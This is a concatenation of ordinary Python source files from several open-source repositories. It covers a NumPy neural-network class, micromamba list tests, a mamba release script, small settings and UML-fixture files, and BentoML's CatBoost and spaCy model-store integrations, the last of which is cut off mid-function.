A `Network` is defined using an input_size.
`Layers` can be then stacked in the network using `network.stack`.
After `Layers` being stacked, the output can be defined using `network.output`.
Finally, the `Network` can be trained and test using `network.train` and `network.test`
on given datasets.
A `Network` can also embedded a specific `Logger` to output result in the standard output
or in a csv file for example. See `network.with_logger` and `Loggers`
A `Network` can also be constructed from given weights matrices and bias vectors
using the static method `Network.create_from_W_b`
Weights and biases of a network can also be extracted using `network.get_Ws_bs`.
"""
def __init__(self, input_size, name="Simple Network"):
self.layers = []
self.input_size = input_size
self._output_layer = SoftMaxCrossEntropyOutputLayer(size=2)
self.done_constructing = False
self._times_trained = 0
self.batch_size = 32
self.name = name
self.logger = StdOutLogger()
def __str__(self):
string = "=========================\n"
string += f"{self.name}\n"
string += f" - Input size: {self.input_size}\n"
string += f" - # Parameters : {self.get_num_parameters()}\n"
string += f" - Times trained: {self._times_trained}\n"
string += f" - Batch size: {self.batch_size}\n"
string += "\nLayers:\n"
for (i, layer) in enumerate(self.layers):
string += f" - Layer #{i+1}"
string += str(layer)
string += "\n"
string += str(self._output_layer)
string += "\n=========================\n"
return string
@staticmethod
def create_from_Ws_and_bs(Ws: list, bs: list):
"""
Creates a network from a list on weights and biases.
Each `Layer` gets created (in the order) according to a pair of zip(W, b).
For now, the output layer is a `SoftMaxCrossEntropyOutputLayer`.
:param Ws: list of weights to use in layers
:param bs: list of biases to use in networks
:return: a `Network` with the given architecture
"""
if len(Ws) != len(bs):
raise RuntimeError("Ws and bs don't have the same number of elements:\n"
f"len(Ws) = {len(Ws)} != len(bs)={len(bs)}")
input_size = Ws[0].shape[1]
network = Network(input_size=input_size)
# We keep the last parameters for the output layer
last_W = Ws.pop()
last_b = bs.pop()
previous_layer_size = input_size
packs = zip(Ws, bs)
for W, b in packs:
layer = Layer.from_W_b(previous_layer_size, W, b)
previous_layer_size = layer.size
network.stack(layer)
network._output_layer = SoftMaxCrossEntropyOutputLayer.from_W_b(previous_layer_size, last_W, last_b)
network.done_constructing = True
return network
def with_logger(self, logger: Logger):
"""
Specify a `Logger` to use for the network.
:param logger: the logger to use
:return: the same but modified `Network`
"""
self.logger = logger
return self
def stack(self, layer: Layer):
"""
Stack (append) a layer to the Network
:param layer:
:return: the same `Network` but with this new layer
"""
self.layers.append(layer)
return self
def output(self, output_layer: SoftMaxCrossEntropyOutputLayer):
"""
Specify the output layer to use and initialise the `Network`.
The `Network` can now be trained and test.
:param output_layer: the OutputLayer to use.
:return:
"""
if self.done_constructing:
raise RuntimeError("Network already set: output() called twice")
self._output_layer = output_layer
previous_layer_size = self.input_size
dims = []
for layer in self.layers:
dims.append(layer._initialise(previous_layer_size))
previous_layer_size = layer.size
self._output_layer._initialise(previous_layer_size)
self.done_constructing = True
return self
def train(self, x_train: np.ndarray, y_train: np.ndarray, num_epochs=10, verbose=True):
"""
Train a `Network` using the data provided for a given number of epochs.
An epoch correspond to a full-pass on the data-set for a training.
:param x_train: the inputs to use to train
:param y_train: the labels to use to train
:param num_epochs: the number of epochs for the training
:param verbose: if true, logs progress
:return: the same `Network` but trained one more time
"""
self._prepropagation_check(x_train, y_train)
def printv(t): not verbose or print(t)
# If the dataset only consists of one example, it is represented as a vector
# If it is the case, we change it to be a matrix so that the processing is the same
if len(x_train.shape) == 1:
x_train = x_train[:, np.newaxis]
y_train = y_train[:, np.newaxis]
n_sample = x_train.shape[1]
printv(f"Training the network for the {self._times_trained+1} time")
for n_epoch in range(1, num_epochs + 1):
printv(f"| Epoch {n_epoch} / {num_epochs}")
accuracy, cost = 0., 0.
for n_b, batch_indices in enumerate(self._batcher(self.batch_size, n_sample)):
x_batch = x_train[:, batch_indices]
y_batch = y_train[:, batch_indices]
y_hat = self._forward_propagation(x_batch)
y_pred = one_hot(y_hat.argmax(axis=0))
accuracy = np.mean(1 * (y_pred == y_batch))
cost = self._output_layer.cost(y_hat, y_batch)
assert y_hat.shape[0] == self._output_layer.size
assert y_batch.shape[0] == self._output_layer.size
self._back_propagation(y_batch)
self._optimize()
self.logger.log_cost_accuracy(n_epoch, cost, accuracy)
self._times_trained += 1
return self
def test(self, x_test: np.ndarray, y_test: np.ndarray, warn=True):
"""
Test a `Network` using the data provided for a given number of epochs.
An epoch correspond to a full-pass on the data-set for a training.
:param x_test: the inputs used to test
:param y_test: the labels used to test
:param warn: if true, warn in case of a `Network` not having been trained.
:return: the predictions, the outputs and associated accuracy
"""
self._prepropagation_check(x_test, y_test)
if warn and self._times_trained == 0:
warnings.warn("The network has not been trained yet: results will be fuzzy!")
# If the dataset only consists of one example, it is represented as a vector
# If it is the case, we change it to be a matrix so that the processing is the same
if len(x_test.shape) == 1:
x_test = x_test[:, np.newaxis]
y_test = y_test[:, np.newaxis]
n_sample = x_test.shape[1]
# Outputs of the networks
y_hat = y_test * 0
for batch_indices in self._batcher(self.batch_size, n_sample):
x_batch = x_test[:, batch_indices]
# Here, we don't persist the results calculate during the forward
# propagation because results are persisted uniquely for training
y_hat[:, batch_indices] = self._forward_propagation(x_batch, persist=False)
# Doing an hard max on the output to find the prediction
y_pred = one_hot(y_hat.argmax(axis=0), num_classes=self._output_layer.size)
accuracy = np.mean(1 * (y_pred == y_test))
return y_pred, y_hat, accuracy
def benchmark(self, x_train: np.ndarray, y_train: np.ndarray, x_test: np.ndarray, y_test: np.ndarray,
num_epochs=10, verbose=True, csv_file_name=None, warn=True):
"""
Benchmark a network. This consist of training a network with dataset (x_train,_train)
from scratch and testing it at each iteration with dataset (x_test, y_test)
An iteration correspond to the processing of a mini-batch.
This routine can be slow has testing is done at each iteration.
A `BenchmarkLogger` is updated with the logs of the benchmark and can be then used to plot
the results.
:param x_train: the inputs to use for the training
:param y_train: the labels to use for the training
:param x_test: the inputs to use for the training
:param y_test: the labels to use for the training
:param num_epochs: the number of epochs to perform
:param verbose: if true, logs progress
:param csv_file_name: the csv file to use to persist the log
:param warn: if true, warns about the network being already trained
:return: a `BenchmarkLogger` containing logs of the benchmark
"""
self._prepropagation_check(x_train, y_train)
def printv(t): not verbose or print(t)
if warn and self._times_trained > 0:
warnings.warn("The network has already been trained: results might not be representative for the benchmark")
# If the dataset only consists of one example, it is represented as a vector
# If it is the case, we change it to be a matrix so that the processing is the same
if len(x_train.shape) == 1:
x_train = x_train[:, np.newaxis]
y_train = y_train[:, np.newaxis]
n_sample = x_train.shape[1]
printv(f"Training the network for the {self._times_trained+1} time")
logger = BenchmarkLogger(csv_file_name=csv_file_name)
for n_epoch in range(1, num_epochs + 1):
printv(f"| Epoch {n_epoch} / {num_epochs}")
train_cost, test_cost, train_acc, test_acc = 0,0,0,0
for n_b, batch_indices in enumerate(self._batcher(self.batch_size, n_sample)):
x_batch = x_train[:, batch_indices]
y_batch = y_train[:, batch_indices]
y_hat = self._forward_propagation(x_batch)
y_pred = one_hot(y_hat.argmax(axis=0))
train_acc = np.mean(1 * (y_pred == y_batch))
train_cost = self._output_layer.cost(y_hat, y_batch)
assert y_hat.shape[0] == self._output_layer.size
assert y_batch.shape[0] == self._output_layer.size
self._back_propagation(y_batch)
self._optimize()
y_pred_test, y_hat_test, test_acc = self.test(x_test, y_test, warn=False)
test_cost = self._output_layer.cost(y_hat_test, y_test)
logger.benchmark_log(train_cost=train_cost, train_acc=train_acc, test_cost=test_cost, test_acc=test_acc)
print("Training Cost:", train_cost)
print("Testing Cost:", test_cost)
print("Training Accuracy:", train_acc)
print("Testing Accuracy:", test_acc)
return logger
def get_Ws_bs(self) -> (list, list):
"""
:return: a tuple of the list of weights and the list of bias to the `Network`.
"""
if not self.done_constructing:
raise RuntimeError("The Network has not been completely constructed yet.")
Ws = []
bs = []
for l in self.layers:
Ws.append(l.W)
bs.append(l.b)
Ws.append(self._output_layer.W)
bs.append(self._output_layer.b)
return Ws, bs
def get_dWs_dbs(self) -> (list, list):
"""
:return: a tuple of two lists : one of the last gradients of weights, the other for the biases
"""
if not self.done_constructing:
raise RuntimeError("The Network has not been completely constructed yet.")
d_Ws = []
d_bs = []
for l in self.layers:
d_Ws.append(l._get_d_W())
d_bs.append(l._get_d_b())
d_Ws.append(self._output_layer._get_d_W())
d_bs.append(self._output_layer._get_d_b())
return d_Ws, d_bs
def get_num_parameters(self)->int:
"""
:return: the total number of parameters in the network
"""
num_parameters = 0
for layer in self.layers:
num_parameters += layer.get_num_parameters()
num_parameters += self._output_layer.get_num_parameters()
return num_parameters
# =============== #
# Private methods #
# =============== #
@staticmethod
def _batcher(batch_size, n_samples, shuffle=True):
n_batches = n_samples // batch_size
n_batches += 1 * (n_samples % batch_size != 0)
indices = np.arange(n_samples)
if shuffle:
np.random.shuffle(indices)
for i in range(n_batches):
start_batch = i * batch_size
end_batch = min(n_samples, (i + 1) * batch_size)
yield indices[start_batch:end_batch]
def _prepropagation_check(self, x_array: np.ndarray, y_array: np.ndarray):
if not self.done_constructing:
raise RuntimeError("Network not yet initialised : define output layer using output()")
# Checking samples consistency
have_one_sample = (len(x_array.shape) == 1 and len(y_array.shape) == 1)
have_same_number_samples = have_one_sample or x_array.shape[1] == y_array.shape[1]
assert have_same_number_samples
# Checking dimensions consistency
assert (x_array.shape[0] == self.input_size)
assert (y_array.shape[0] == self._output_layer.size)
def _forward_propagation(self, inputs: np.ndarray, persist=True) -> np.ndarray:
x_array = inputs
for layer in self.layers:
x_array = layer._forward_propagate(x_array, persist=persist)
y_hat = self._output_layer._forward_propagate(x_array, persist=persist)
# Test the consistency w.r.t samples
# Some boilerplate code here as we need to check both the case of
# a single vector (only one sample) and the case of a matrix (multiple samples)
have_one_sample = (len(y_hat.shape) == 1 and len(inputs.shape) == 1)
have_same_number_samples = have_one_sample or y_hat.shape[1] == inputs.shape[1]
assert have_same_number_samples
assert (y_hat.shape[0] == self._output_layer.size)
return y_hat
def _back_propagation(self, y: np.ndarray):
W_T_l, delta_l = self._output_layer._back_propagate(y)
for layer in reversed(self.layers):
assert (W_T_l.shape[0] == layer.size)
W_T_l, delta_l = layer._back_propagate(W_T_l, delta_l)
def _optimize(self):
self._output_layer._optimize()
for layer in self.layers:
layer._optimize()
``` |
{
"source": "jjerphan/mamba",
"score": 2
} |
#### File: micromamba/tests/test_list.py
```python
import json
import os
import re
import shutil
import subprocess
import pytest
from .helpers import create, get_env, get_umamba, random_string, umamba_list
class TestList:
env_name = random_string()
root_prefix = os.environ["MAMBA_ROOT_PREFIX"]
current_prefix = os.environ["CONDA_PREFIX"]
prefix = os.path.join(root_prefix, "envs", env_name)
@classmethod
def setup_class(cls):
create("xtensor=0.18", "-n", TestList.env_name, "--json", no_dry_run=True)
os.environ["CONDA_PREFIX"] = TestList.prefix
@classmethod
def teardown_class(cls):
os.environ["CONDA_PREFIX"] = TestList.current_prefix
shutil.rmtree(get_env(TestList.env_name))
@pytest.mark.parametrize("quiet_flag", ["", "-q", "--quiet"])
@pytest.mark.parametrize("env_selector", ["", "name", "prefix"])
def test_list(self, env_selector, quiet_flag):
if env_selector == "prefix":
res = umamba_list("-p", TestList.prefix, "--json", quiet_flag)
elif env_selector == "name":
res = umamba_list("-n", TestList.env_name, "--json", quiet_flag)
else:
res = umamba_list("--json", quiet_flag)
assert len(res) > 2
names = [i["name"] for i in res]
assert "xtensor" in names
assert "xtl" in names
@pytest.mark.parametrize("env_selector", ["name", "prefix"])
def test_not_existing(self, env_selector):
if env_selector == "prefix":
cmd = (
"-p",
os.path.join(TestList.root_prefix, "envs", random_string()),
"--json",
)
elif env_selector == "name":
cmd = ("-n", random_string(), "--json")
with pytest.raises(subprocess.CalledProcessError):
umamba_list(*cmd)
def test_not_environment(self):
with pytest.raises(subprocess.CalledProcessError):
umamba_list(
"-p", os.path.join(TestList.root_prefix, "envs"), "--json",
)
@pytest.mark.parametrize("quiet_flag", ["", "-q", "--quiet"])
def test_regex(self, quiet_flag):
full_res = umamba_list("--json")
names = sorted([i["name"] for i in full_res])
filtered_res = umamba_list("\\**", "--json", quiet_flag)
filtered_names = sorted([i["name"] for i in filtered_res])
assert filtered_names == names
filtered_res = umamba_list("^xt", "--json", quiet_flag)
filtered_names = sorted([i["name"] for i in filtered_res])
assert filtered_names == ["xtensor", "xtl"]
```
#### File: jjerphan/mamba/releaser.py
```python
import copy
import datetime
import re
template = {"version": None, "changes": []}
templates = {
"libmamba": "libmamba/include/mamba/version.hpp.tmpl",
"micromamba": "micromamba/src/version.hpp.tmpl",
"libmambapy": "libmambapy/libmambapy/_version.py.tmpl",
"mamba": "mamba/mamba/_version.py.tmpl",
}
def apply_changelog(name, version, changes):
res = ""
today = datetime.date.today()
fmt_today = today.strftime("%B %d, %Y")
header_line = f"{name} {version} ({fmt_today})"
res += f"{header_line}\n{'=' * len(header_line)}\n\n"
for idx, c in enumerate(changes):
if c.startswith("-"):
if idx > 0 and not changes[idx - 1].startswith("- "):
res += f"\n{c}\n"
else:
res += f"{c}\n"
else:
res += f"{c}\n"
res += "\n"
cl_file = name + "/CHANGELOG.md"
with open(cl_file, "r") as fi:
prev_cl = fi.read()
with open(cl_file, "w") as fo:
fo.write(res + prev_cl)
version_major, version_minor, version_patch = version.split(".")
def template_substitute(contents):
x = contents.replace("{{ version_major }}", version_major)
x = x.replace("{{ version_minor }}", version_minor)
x = x.replace("{{ version_patch }}", version_patch)
return x
if name in templates:
template = templates[name]
with open(template, "r") as fi:
final = template_substitute(fi.read())
with open(template[: -len(".tmpl")], "w") as fo:
fo.write(final)
def commands(changes):
print("pre-commit run --all")
print("git diff")
commit_msg = ", ".join([f"{x} {changes[x]['version']}" for x in changes])
today = datetime.date.today()
date_stamp = today.strftime("%Y.%m.%d")
files_to_commit = ""
for c in changes:
files_to_commit += f" {c}/CHANGELOG.md \\\n"
files_to_commit += f" {templates[c][:-len('.tmpl')]} \\\n"
files_to_commit = files_to_commit[:-3]
print(f"git commit -m 'release {commit_msg}' \\\n{files_to_commit}")
print(f"git tag {date_stamp}")
for c in changes:
print(f"git tag {c}_{changes[c]['version']}")
class Section:
def __init__(self):
self.items = []
self.applies_to = ["all"]
self.text = ""
class Item:
def __init__(self):
self.applies_to = ["all"]
self.text = ""
def populate_changes(name, sections, changes):
el = changes[name]
def applies(x):
return "all" in x or name in x
for s in sections:
s_applies = applies(s.applies_to)
if s_applies and len(s.items):
s_applies = any(applies(i.applies_to) for i in s.items)
if s_applies:
if s != sections[0]:
el["changes"].append("\n" + s.text.strip())
else:
el["changes"].append(s.text.strip())
for i in s.items:
if applies(i.applies_to):
el["changes"].append(f"- {i.text.strip()}")
def main():
changes = {}
with open("CHANGELOG.md", "r") as fi:
contents = fi.readlines()
for idx, line in enumerate(contents):
if line.startswith("====="):
release_start = idx + 1
break
brackets_re = re.compile(r"\[(.*)\]")
# section with groups, heading + items
sections = []
in_section = False
contents = contents[release_start:]
for idx, c in enumerate(contents):
if c.startswith("Releases"):
releases = [x.strip() for x in c[len("Releases: ") :].split(",")]
for r in releases:
rsplit = r.split()
changes[rsplit[0].strip()] = copy.deepcopy(template)
changes[rsplit[0].strip()]["version"] = rsplit[1].strip()
continue
if contents[idx + 1].startswith("===="):
break
if c.strip() == "" or c[0] == "-":
in_section = False
if c.strip() == "":
continue
if c[0] != "-":
if not in_section:
sections.append(Section())
in_section = True
sections[-1].text += c
if m := re.search(brackets_re, c):
if in_section:
sections[-1].applies_to = [x.strip() for x in m.groups(1)[0].split(",")]
else:
sections[-1].items.append(Item())
sections[-1].items[-1].text = c[m.end() :].strip()
sections[-1].items[-1].applies_to = [
x.strip() for x in m.groups(1)[0].split(",")
]
else:
if c.startswith(" "):
if in_section:
sections[-1].text += " " + c.strip()
else:
sections[-1].items[-1].text += c.strip()
else:
if not in_section:
sections[-1].items.append(Item())
sections[-1].items[-1].text = c.strip()
sections[-1].items[-1].applies_to = ["all"]
for c in changes:
populate_changes(c, sections, changes)
for el in changes:
apply_changelog(el, changes[el]["version"], changes[el]["changes"])
commands(changes)
if __name__ == "__main__":
main()
``` |
{
"source": "jjerphan/pils",
"score": 3
} |
#### File: pils/pils/settings.py
```python
import os
# Folders structures
HERE = os.path.abspath(os.path.join(os.path.realpath(__file__), os.pardir))
ROOT = os.path.join(HERE, os.pardir)
PROBLEMS_FOLDER = os.path.join(HERE, "problems")
BIN_FOLDER = os.path.join(HERE, "bin")
TEMP_FOLDER = os.path.join(HERE, "temp")
def clean_lines(lines):
return list(map(lambda f: f.replace("\n", ""), lines))
``` |
{
"source": "jjerphan/py2puml",
"score": 3
} |
#### File: withsubdomain/subdomain/insubdomain.py
```python
def horsepower_to_kilowatt(horsepower: float) -> float:
return horsepower * 745.7
class Engine(object):
horsepower: int
class Pilot(object):
name: str
``` |
{
"source": "jjerry-k/BentoML",
"score": 2
} |
#### File: _internal/frameworks/catboost.py
```python
import typing as t
from typing import TYPE_CHECKING
from simple_di import inject
from simple_di import Provide
from bentoml import Tag
from bentoml import Model
from bentoml import Runner
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..utils import LazyLoader
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING:
import numpy as np
from pandas.core.frame import DataFrame
from ..models import ModelStore
else:
np = LazyLoader("np", globals(), "numpy")
try:
import catboost as cbt
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""catboost is required in order to use module `bentoml.catboost`, install
catboost with `pip install catboost`. For more information, refers to
https://catboost.ai/docs/concepts/python-installation.html
"""
)
MODULE_NAME = "bentoml.catboost"
# TODO: support cbt.Pool runner io container
CATBOOST_EXT = "cbm"
def _get_model_info(
tag: Tag,
model_params: t.Optional[t.Dict[str, t.Union[str, int]]],
model_store: "ModelStore",
) -> t.Tuple["Model", str, t.Dict[str, t.Any]]:
model = model_store.get(tag)
if model.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
)
model_file = model.path_of(f"{SAVE_NAMESPACE}.{CATBOOST_EXT}")
_model_params: t.Dict[str, t.Union[str, int]] = (
dict() if not model_params else model_params
)
for key, value in model.info.options.items():
if key not in _model_params:
_model_params[key] = value # pragma: no cover
return model, model_file, _model_params
def _load_helper(
model_file: str, model_params: t.Optional[t.Dict[str, t.Union[str, int]]]
) -> t.Union[
cbt.core.CatBoost,
cbt.core.CatBoostClassifier,
cbt.core.CatBoostRegressor,
]:
if model_params is not None:
model_type = model_params["model_type"]
if model_type == "classifier":
model = cbt.core.CatBoostClassifier()
elif model_type == "regressor":
model = cbt.core.CatBoostRegressor()
else:
model = cbt.core.CatBoost()
else:
model = cbt.core.CatBoost()
_m: t.Union[
cbt.core.CatBoost,
cbt.core.CatBoostClassifier,
cbt.core.CatBoostRegressor,
] = model.load_model(model_file)
return _m
@inject
def load(
tag: t.Union[str, Tag],
model_params: t.Optional[t.Dict[str, t.Union[str, int]]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> t.Union[
cbt.core.CatBoost, cbt.core.CatBoostClassifier, cbt.core.CatBoostRegressor
]:
"""
Load a CatBoost model from BentoML local modelstore with given name.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
model_params (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`): Parameters for
a CatBoost model. Following parameters can be specified:
- model_type(:code:`str`): :obj:`classifier` (`CatBoostClassifier`) or :obj:`regressor` (`CatBoostRegressor`)
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`Union[catboost.core.CatBoost, catboost.core.CatBoostClassifier, catboost.core.CatBoostRegressor]`: one of :code:`catboost.core.CatBoostClassifier`,
:code:`catboost.core.CatBoostRegressor` or :code:`catboost.core.CatBoost` from BentoML modelstore.
Examples:
.. code-block:: python
import bentoml
booster = bentoml.catboost.load("my_model:latest", model_params=dict(model_type="classifier"))
""" # noqa
_, _model_file, _model_params = _get_model_info(tag, model_params, model_store)
return _load_helper(_model_file, _model_params)
@inject
def save(
name: str,
model: t.Union[
cbt.core.CatBoost,
cbt.core.CatBoostClassifier,
cbt.core.CatBoostRegressor,
],
*,
model_params: t.Optional[t.Dict[str, t.Union[str, t.Any]]] = None,
model_export_parameters: t.Optional[t.Dict[str, t.Any]] = None,
model_pool: t.Optional["cbt.core.Pool"] = None,
metadata: t.Union[None, t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Save a model instance to BentoML modelstore.
Args:
name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
model (:code:`Union[catboost.core.CatBoost, catboost.core.CatBoostClassifier, catboost.CatBoostRegressor]`):
Instance of model to be saved
model_params (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`):
Parameters for a CatBoost model. Following parameters can be specified:
- model_type(:code:`str`): :obj:`classifier` (`CatBoostClassifier`) or :obj:`regressor` (`CatBoostRegressor`)
model_export_parameters (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`):
Export parameters for given model.
model_pool (:code:`cbt.core.Pool`, `optional`, default to :code:`None`):
CatBoost data pool for given model.
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.types.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
Examples:
.. code-block:: python
from sklearn.datasets import load_breast_cancer
import catboost as cbt
# read in data
cancer = load_breast_cancer()
X = cancer.data
y = cancer.target
# create and train model
model = cbt.CatBoostClassifier(iterations=2,
depth=2,
learning_rate=1,
loss_function='Logloss',
verbose=True)
model.fit(X, y)
...
tag = bentoml.catboost.save("my_catboost_model", model, model_params=dict(model_type="classifier"))
# load the booster back:
loaded = bentoml.catboost.load("my_catboost_model:latest")
# or:
loaded = bentoml.catboost.load(tag)
""" # noqa
if not model_params:
model_params = {}
if "model_type" not in model_params:
model_params["model_type"] = "classifier"
context = {
"framework_name": "catboost",
"pip_dependencies": [f"catboost=={get_pkg_version('catboost')}"],
}
_model = Model.create(
name,
module=MODULE_NAME,
options=model_params,
metadata=metadata,
context=context,
)
path = _model.path_of(f"{SAVE_NAMESPACE}.{CATBOOST_EXT}")
format_ = CATBOOST_EXT
model.save_model(
path,
format=format_,
export_parameters=model_export_parameters,
pool=model_pool,
)
_model.save(model_store)
return _model.tag
class _CatBoostRunner(Runner):
@inject
def __init__(
self,
tag: Tag,
predict_fn_name: str,
model_params: t.Optional[t.Dict[str, t.Union[str, int]]],
name: str,
resource_quota: t.Optional[t.Dict[str, t.Any]],
batch_options: t.Optional[t.Dict[str, t.Any]],
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
):
model_info, model_file, _model_params = _get_model_info(
tag, model_params, model_store
)
super().__init__(name, resource_quota, batch_options)
self._model_info = model_info
self._model_file = model_file
self._predict_fn_name = predict_fn_name
self._model_params = _model_params
@property
def required_models(self) -> t.List[Tag]:
return [self._model_info.tag]
@property
def num_concurrency_per_replica(self) -> int:
return 1
@property
def num_replica(self) -> int:
return int(round(self.resource_quota.cpu))
# pylint: disable=attribute-defined-outside-init
def _setup(self) -> None:
self._model = _load_helper(self._model_file, self._model_params)
self._predict_fn = getattr(self._model, self._predict_fn_name)
# pylint: disable=arguments-differ
def _run_batch( # type: ignore[reportIncompatibleMethodOverride]
self,
inputs: t.Union["np.ndarray[t.Any, np.dtype[t.Any]]", "DataFrame", cbt.Pool],
) -> "np.ndarray[t.Any, np.dtype[t.Any]]":
res = self._predict_fn(inputs)
return np.asarray(res)
@inject
def load_runner(
tag: t.Union[str, Tag],
predict_fn_name: str = "predict",
*,
model_params: t.Union[None, t.Dict[str, t.Union[str, int]]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
name: t.Optional[str] = None,
resource_quota: t.Union[None, t.Dict[str, t.Any]] = None,
batch_options: t.Union[None, t.Dict[str, t.Any]] = None,
) -> "_CatBoostRunner":
"""
Runner represents a unit of serving logic that can be scaled horizontally to
maximize throughput. `bentoml.catboost.load_runner` implements a Runner class that
wrap around a CatBoost model, which optimize it for the BentoML runtime.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
predict_fn_name (:code:`str`, default to :code:`predict`):
Options for inference functions. `predict` are the default function.
model_params (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`): Parameters for
a CatBoost model. Following parameters can be specified:
- model_type(:code:`str`): :obj:`classifier` (`CatBoostClassifier`) or :obj:`regressor` (`CatBoostRegressor`)
resource_quota (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure resources allocation for runner.
batch_options (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure batch options for runner in a service context.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.runner.Runner`: Runner instances for :mod:`bentoml.catboost` model
Examples:
.. code-block:: python
import catboost as cbt
import pandas as pd
input_data = pd.read_csv("/path/to/csv")
runner = bentoml.catboost.load_runner("my_model:latest"")
runner.run(cbt.Pool(input_data))
""" # noqa
tag = Tag.from_taglike(tag)
if name is None:
name = tag.name
return _CatBoostRunner(
tag=tag,
predict_fn_name=predict_fn_name,
model_params=model_params,
model_store=model_store,
name=name,
resource_quota=resource_quota,
batch_options=batch_options,
)
```
#### File: _internal/frameworks/spacy.py
```python
import os
import sys
import typing as t
import logging
import importlib
from typing import TYPE_CHECKING
from pathlib import Path
from functools import partial
from distutils.dir_util import copy_tree
import yaml
from simple_di import inject
from simple_di import Provide
from bentoml import Tag
from bentoml import Model
from bentoml import Runner
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..utils import LazyLoader
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..bento.pip_pkg import split_requirement
from ..bento.pip_pkg import packages_distributions
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING: # pragma: no cover
from spacy.vocab import Vocab
from thinc.config import Config
from spacy.tokens.doc import Doc
from ..models import ModelStore
if sys.version_info >= (3, 8):
from typing import Literal
else: # pragma: no cover
from typing_extensions import Literal
try:
import spacy
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""\
`spacy` is required to use with `bentoml.spacy`.
Instruction: Refers to https://spacy.io/usage for more information.
"""
)
MODULE_NAME = "bentoml.spacy"
util = LazyLoader("util", globals(), "spacy.util")
thinc_util = LazyLoader("thinc_util", globals(), "thinc.util")
thinc_backends = LazyLoader("thinc_backends", globals(), "thinc.backends")
torch = LazyLoader("torch", globals(), "torch")
tensorflow = LazyLoader("tensorflow", globals(), "tensorflow")
_TORCH_TF_WARNING = """\
It is recommended that if you want to run SpaCy with {framework}
model that you also have `{package}` installed.
Refers to {link} for more information.
We also detected that you choose to run on GPUs, thus in order to utilize
BentoML Runners features with GPUs you should also install `{package}` with
CUDA support.
""" # noqa
PROJECTS_CMD_NOT_SUPPORTED = [
"assets",
"document",
"dvc",
"push",
"run",
]
logger = logging.getLogger(__name__)
@inject
def load_project(
tag: Tag,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> str:
model = model_store.get(tag)
if model.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
)
if "projects_uri" in model.info.options:
logger.warning(
"We will only returns the path of projects saved under BentoML modelstore"
" and leave projects interaction for users to decide what they want to do."
" Refers to https://spacy.io/api/cli#project for more information."
)
return os.path.join(model.path, model.info.options["target_path"])
raise BentoMLException(
"Cannot use `bentoml.spacy.load_project()` to load non Spacy Projects. If your"
" model is not a Spacy projects use `bentoml.spacy.load()` instead."
)
@inject
def load(
tag: t.Union[str, Tag],
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
vocab: t.Union["Vocab", bool] = True, # type: ignore[reportUnknownParameterType]
disable: t.Iterable[str] = util.SimpleFrozenList(), # noqa
exclude: t.Iterable[str] = util.SimpleFrozenList(), # noqa
config: t.Union[t.Dict[str, t.Any], "Config"] = util.SimpleFrozenDict(), # noqa
) -> "spacy.language.Language":
"""
Load a model from BentoML local modelstore with given name.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
vocab (:code:`Union[spacy.vocab.Vocab, bool]`, `optional`, defaults to `True`):
Optional vocab to pass in on initialization. If True, a new Vocab object will be created.
disable (`Iterable[str]`, `optional`):
Names of pipeline components to disable.
exclude (`Iterable[str]`, `optional`):
Names of pipeline components to exclude. Excluded
components won't be loaded.
config (:code:`Union[Dict[str, Any], spacy.Config]`, `optional`):
Config overrides as nested dict or dict
keyed by section values in dot notation.
Returns:
:obj:`spacy.language.Language`: an instance of :obj:`spacy.Language` from BentoML modelstore.
Examples:
.. code-block:: python
import bentoml
model = bentoml.spacy.load('custom_roberta')
"""
model = model_store.get(tag)
if model.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
)
if "projects_uri" in model.info.options:
raise BentoMLException(
"Cannot use `bentoml.spacy.load()` to load Spacy Projects. Use"
" `bentoml.spacy.load_project()` instead."
)
required = model.info.options["pip_package"]
try:
_ = importlib.import_module(required)
except ModuleNotFoundError:
try:
from spacy.cli.download import download
# TODO: move this to runner on startup hook
download(required)
except (SystemExit, Exception): # pylint: disable=broad-except
